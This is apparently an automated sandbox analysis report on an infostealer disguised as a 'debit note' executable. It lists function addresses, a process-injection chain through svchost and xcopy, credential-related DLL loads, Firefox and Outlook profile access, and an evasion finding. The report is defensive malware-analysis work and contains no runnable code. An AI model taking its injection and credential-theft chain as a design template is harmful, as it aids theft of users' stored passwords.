Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B3A6C	1_2_036B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FFA49	1_2_036FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F7A46	1_2_036F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EDAC6	1_2_036EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DDAAC	1_2_036DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03685AA0	1_2_03685AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363EA80	1_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03656962	1_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03649950	1_2_03649950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B950	1_2_0365B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036429A0	1_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370A9A6	1_2_0370A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03642840	1_2_03642840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364A840	1_2_0364A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AD800	1_2_036AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036438E0	1_2_036438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E8F0	1_2_0366E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036268B8	1_2_036268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B4F40	1_2_036B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03682F28	1_2_03682F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03660F30	1_2_03660F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FFF09	1_2_036FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03632FC8	1_2_03632FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FFFB1	1_2_036FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641F92	1_2_03641F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640E59	1_2_03640E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FEE26	1_2_036FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FEEDB	1_2_036FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03649EB0	1_2_03649EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03652E90	1_2_03652E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FCE93	1_2_036FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F7D73	1_2_036F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03643D40	1_2_03643D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F1D5A	1_2_036F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364AD00	1_2_0364AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363ADE0	1_2_0363ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365FDC0	1_2_0365FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03658DBF	1_2_03658DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B9C32	1_2_036B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640C00	1_2_03640C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03630CF2	1_2_03630CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FFCF2	1_2_036FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0CB5	1_2_036E0CB5
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0358D34C	6_2_0358D34C
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0365A352	6_2_0365A352
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0365132D	6_2_0365132D
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_036603E6	6_2_036603E6
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035AE3F0	6_2_035AE3F0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035E739A	6_2_035E739A
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03640274	6_2_03640274
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_036412ED	6_2_036412ED
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035BB2C0	6_2_035BB2C0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035BD2F0	6_2_035BD2F0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035A52A0	6_2_035A52A0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0366B16B	6_2_0366B16B
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0358F172	6_2_0358F172
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D516C	6_2_035D516C
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03628158	6_2_03628158
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03590100	6_2_03590100
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0363A118	6_2_0363A118
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_036581CC	6_2_036581CC
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_036601AA	6_2_036601AA
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035AB1B0	6_2_035AB1B0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0365F0E0	6_2_0365F0E0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_036570E9	6_2_036570E9
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035A70C0	6_2_035A70C0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0364F0CC	6_2_0364F0CC
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035C4750	6_2_035C4750
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035A0770	6_2_035A0770
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0359C7C0	6_2_0359C7C0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0365F7B0	6_2_0365F7B0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_036516CC	6_2_036516CC
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035BC6E0	6_2_035BC6E0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03657571	6_2_03657571
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035A0535	6_2_035A0535
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0363D5B0	6_2_0363D5B0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03660591	6_2_03660591
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03652446	6_2_03652446
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03591460	6_2_03591460
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0365F43F	6_2_0365F43F
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0364E4F6	6_2_0364E4F6
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0365FB76	6_2_0365FB76
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0365AB40	6_2_0365AB40
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03615BF0	6_2_03615BF0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035DDBF9	6_2_035DDBF9
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03656BD7	6_2_03656BD7
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035BFB80	6_2_035BFB80
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03613A6C	6_2_03613A6C
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03657A46	6_2_03657A46
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0365FA49	6_2_0365FA49
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0364DAC6	6_2_0364DAC6
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0363DAAC	6_2_0363DAAC
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0359EA80	6_2_0359EA80
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035E5AA0	6_2_035E5AA0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035A9950	6_2_035A9950
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035BB950	6_2_035BB950
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035B6962	6_2_035B6962
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0366A9A6	6_2_0366A9A6
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035A29A0	6_2_035A29A0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035A2840	6_2_035A2840
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035AA840	6_2_035AA840
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0360D800	6_2_0360D800
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035CE8F0	6_2_035CE8F0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035A38E0	6_2_035A38E0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035868B8	6_2_035868B8
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03614F40	6_2_03614F40
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0365FF09	6_2_0365FF09
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035C0F30	6_2_035C0F30
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035E2F28	6_2_035E2F28
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03592FC8	6_2_03592FC8
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035A1F92	6_2_035A1F92
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0365FFB1	6_2_0365FFB1
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035A0E59	6_2_035A0E59
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0365EE26	6_2_0365EE26
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0365EEDB	6_2_0365EEDB
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035B2E90	6_2_035B2E90
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035A9EB0	6_2_035A9EB0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0365CE93	6_2_0365CE93
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03657D73	6_2_03657D73
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035A3D40	6_2_035A3D40
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03651D5A	6_2_03651D5A
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035AAD00	6_2_035AAD00
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035BFDC0	6_2_035BFDC0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0359ADE0	6_2_0359ADE0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035B8DBF	6_2_035B8DBF
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03619C32	6_2_03619C32
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035A0C00	6_2_035A0C00
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0365FCF2	6_2_0365FCF2
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03590CF2	6_2_03590CF2
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03640CB5	6_2_03640CB5
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A31B50	6_2_00A31B50
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A35190	6_2_00A35190
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A333D0	6_2_00A333D0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A4B680	6_2_00A4B680
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A2CB20	6_2_00A2CB20
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A2ADC0	6_2_00A2ADC0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A2CD40	6_2_00A2CD40
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A2AF0A	6_2_00A2AF0A
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0335E335	6_2_0335E335
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0335E7EE	6_2_0335E7EE
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03365404	6_2_03365404
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0335E453	6_2_0335E453
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0335CB43	6_2_0335CB43
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_0335D8B8	6_2_0335D8B8
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Code function: 7_2_05655FEF	7_2_05655FEF
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Code function: 7_2_05650FBF	7_2_05650FBF
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Code function: 7_2_0565962F	7_2_0565962F
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Code function: 7_2_056511DF	7_2_056511DF
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Code function: 7_2_0565786F	7_2_0565786F
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Code function: 7_2_0566FB1F	7_2_0566FB1F
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Code function: 7_2_0564F3A9	7_2_0564F3A9
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Code function: 7_2_0564F25F	7_2_0564F25F
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 8_2_000002B455616453	8_2_000002B455616453
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 8_2_000002B4556158B8	8_2_000002B4556158B8
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 8_2_000002B455616335	8_2_000002B455616335
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 8_2_000002B455614B43	8_2_000002B455614B43
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 8_2_000002B45561D404	8_2_000002B45561D404
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 8_2_000002B4556167EE	8_2_000002B4556167EE

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03675130 appears 36 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 036BF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 036AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0362B970 appears 250 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03687E54 appears 93 times
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: String function: 0360EA12 appears 86 times
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: String function: 0358B970 appears 250 times
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: String function: 035D5130 appears 36 times
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: String function: 0361F290 appears 103 times
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: String function: 035E7E54 appears 93 times

Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@14/12

Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe

File created: C:\Users\user\AppData\Local\Temp\overroughly

Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: xcopy.exe, 00000006.00000003.2245386042.0000000003026000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2246331837.0000000003046000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4095507452.0000000003046000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe

ReversingLabs: Detection: 60%

Source: unknown	Process created: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe "C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe"
Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe"
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Process created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
Source: C:\Windows\SysWOW64\xcopy.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe"	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Process created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\xcopy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Source: C:\Windows\SysWOW64\xcopy.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Switches to a custom stack to bypass stack traces

Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe

Static file information: File size 1627136 > 1048576

Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: xcopy.pdbUGP source: svchost.exe, 00000001.00000003.2026657859.0000000003013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2026718174.000000000302B000.00000004.00000020.00020000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000005.00000002.4095627699.0000000000797000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PMZSowQBcVJqD.exe, 00000005.00000000.1982139512.0000000000CDE000.00000002.00000001.01000000.00000005.sdmp, PMZSowQBcVJqD.exe, 00000007.00000000.2133989943.0000000000CDE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: svchost.exe, 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2058786262.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1966811502.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1968342442.0000000003400000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2069920922.000000000320E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4097829136.0000000003560000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4097829136.00000000036FE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2071661986.00000000033B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2058786262.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1966811502.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1968342442.0000000003400000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, xcopy.exe, 00000006.00000003.2069920922.000000000320E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4097829136.0000000003560000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4097829136.00000000036FE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2071661986.00000000033B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: xcopy.pdb source: svchost.exe, 00000001.00000003.2026657859.0000000003013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2026718174.000000000302B000.00000004.00000020.00020000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000005.00000002.4095627699.0000000000797000.00000004.00000020.00020000.00000000.sdmp
